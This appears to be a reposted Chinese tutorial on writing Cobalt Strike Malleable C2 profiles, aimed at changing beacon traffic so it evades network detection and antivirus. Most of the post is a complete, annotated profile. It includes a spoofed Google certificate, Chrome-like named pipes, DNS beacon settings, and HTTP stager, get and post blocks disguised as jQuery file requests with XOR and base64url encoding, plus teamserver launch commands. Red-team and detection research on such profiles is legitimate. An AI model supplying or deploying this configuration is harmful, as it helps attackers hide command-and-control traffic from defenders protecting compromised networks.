CobaltSrtike Malleable C2 Profile编写

本文主要是介绍CobaltSrtike Malleable C2 Profile编写，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

什么是 Malleable C2 Profile

Malleable C2 Profile是一个可以控制CobaltStrike流量特征的文件，可以通过修改配置文件来改变流量特征，从而躲避各种流量检测设备及防病毒系统

调用方法

./teamserver [Teamserver_IP] [Passwd] [C2_Path]# example./teamserver 127.0.0.1 NowSec666 C2Profile/C2.profile

检查方法

使用c2lint检查编写的Profile文件是否符合CobaltStrike要求

./c2lint C2_Path

Profile包含内容

global optionshttps-certificatehttp-get    cliet        metadata    server        output        http-post    client        metadata    server        output
http-stager

Profile配置示例

# 全局配置set sample_name "NowSec_C2_Profiel";set sleeptime "1200000";  # 心跳时间120秒，单位毫秒set jitter "45"; # 抖动值，单位百分比，参考sleeptime值进行抖动
set data_jitter "83"; # Beacon项TeamServer发送http-get、http-post数据时采用随机长度，但最长为设置长度
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36";  # Win10 Chrome UserAgent 用于模拟正常用户请求
# https证书配置-CobaltStrike自签名证书# 这部分配置需要与生成的cobaltstrike.store中的配置一致https-certificate{    set C "US";  #  Country 国家    set CN "GTS CA 1O1";  # Common Name域名    set O "Google Trust Service"; # Organization Name 组织名称    set OU "certificate Department";  # Organization Unit Name 组织单元名称    set validity "63"; # 证书失效天数}# TCP Beacon配置set tcp_port "12580"; # TCP默认端口set tcp_frame_header "\x80"; # 该配置是在TCP信息前追加特定字符
# SMB Beacon配置set pipename "mojo.5688.8052.183894939787088877##"; # 普通Chrome命名管道set pipename "mojo.5688.8052.35780273329370473##"; # 普通Chrome命名管道set smb_frame_header "\x80"; # 该配置实在smb信息前追加的特定字符
# DNS Beacon配置dns-beacon {    set dns_idle "8.8.8.8"; # Beacon不用时指定到的dns地址    set dns_max_txt "252"; # txt最大传输长度    set dns_sleep "0"; # 每个单独dns请求前强制睡眠时间    set dns_ttl "5"; # dns解析在服务器留存时间    set maxdns "255"; # 通过DNS上传数据时，最大主机名长度    set dns_stager_prepend ".resources.123456."; # 将字符串放在通过DNS TXT记录交付的编码有效负载阶段之前    set dns_stager_subhost ".feeds.123456."; # dns txt记录使用的子域set beacon "a.bc.";    set get_A "b.la.";    set get_AAAA "c.4a.";    set get_TXT "d.tx.";    set put_metadata "e.md.";    set put_output "f.po.";    set ns_response "zero";}
# 不同DNS通道说明# mode dns # 是DNS A记录数据通道# mode dns6 # 是DNS AAAA记录数据通道# mode dns-txt 是DNS TXT记录数据通道，DNS TXT记录是莫热门的数据通道# SSH Beacon# 使用SSH协议，进行P2P通信set ssh_banner "OpenSSH_7.4 Debian (proticol 2.0)"; # 配置SSH Beacon 的bannerset ssh_pipename "wkssvc##"; # 配置ssh通信命名管道
# beacon是通过stager下载到内存中去的。在beacon注入目标内存之前，http-get和http-post都不会生效。你可以自己定义stager下载stage的行为。http-stager {    # http-stargruri配置    set uri_x86 "/jquery-3.3.1.slim.min.js"; # 32位系统http beacon访问路径    set uri_x64 "/jquery-3.3.2.slim.min.js"; # 64位系统http beacon访问路径# server配置    server {        # header结构        # header "类型" "类型值";        header "Server" "MicroSoft-IIS/8.0";        header "Cache-Control" "max-age=0, no=cache";        header "Connection" "Keep-alive";        header "Content-Type" "application/javascript; charset=utf-8";output {            prepend "Jquery Code"; # 前置字符串            append "Jqery end COde"; # 结尾字符串            print; # 将数据存在body中        }    }# Clietn配置    client {        header "Accept" "text/html,appliction/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";        header "Accept-Language" "en-US,en;q=0.5";        header "Referer" "http://code.jquery.com/";        header "Accept-Encodeing" "gzip, default";    }}
http-get {    set uri "/jquery-3.3.1.min.js"; # 配置客户端请求URI    set verb "GET"; # 配置客户端请求方式client {        header "Accept" "text/html,appliction/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";        header "Referer" "http://code.jquery.com/";        header "Accept-Encodeing" "gzip, default";metadata {            base64url;            prepend "__cfduid=";            header "Cookie";        }    }server {        header "Server" "NetDNA-cache/2.2";        header "Cache-Control" "max-age=0, no-cache";        header "Pragma" "no-cache";        header "Connection" "keep-alive";        header "Content-Type" "application/javascript; charset=utf-8";output {            mask; # xor异或加密            base64url; # base64编码后，数据放入url中                        # 当出现两个prepend时，会先执行第二个，然后执行第一个            prepend "Jquery Stop Code"; # 前置字符串            prepend "Jquery Start Code"; # 前置字符串            append "Jqery end Code"; # 结尾字符串            print; # 将数据存在body中        }    }}
http-post {    set uri "/jquery-3.3.1.min.js";    set verb "POST";client {        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";        header "Referer" "http://code.jquery.com/";        header "Accept-Encoding" "gzip, deflate";id {            mask;            base64url;            parameter "__cfduid";        }output {            mask;            base64url;            print;        }    }server {        header "Server" "NetDNA-cache/2.2";        header "Cache-Control" "max-age=0, no-cache";        header "Pragma" "no-cache";        header "Connection" "keep-alive";        header "Content-Type" "application/javascript; charset=utf-8";output {            mask; # xor异或加密            base64url; # base64编码后，数据放入url中prepend "Jquery Code"; # 前置字符串            append "Jqery end COde"; # 结尾字符串            print; # 将数据存在body中        }    }}

数据转换

方法	解释
base64	base64方式编码
base64url	base64编码后数据可放入url中
mask	xor异或加密
netbios	SMB 传输过程中针对主机名的编码方式（NetBIOS编码‘a’）
netbiosu	SMB 传输过程中针对主机名的编码方式（NetBIOS编码‘A’）

终止语句

方法	解释
header "Cookie"	将数据存储在http头Cookie字段中
parameter "key"	将数据存储在URL中
print	将数据存储在body中
uri-append	将数据附加在URL中

参考文献

1、深入研究cobalt strike malleable C2配置文件

https://xz.aliyun.com/t/2796

2、参考示例C2文件

https://github.com/threatexpress/malleable-c2

加入我的星球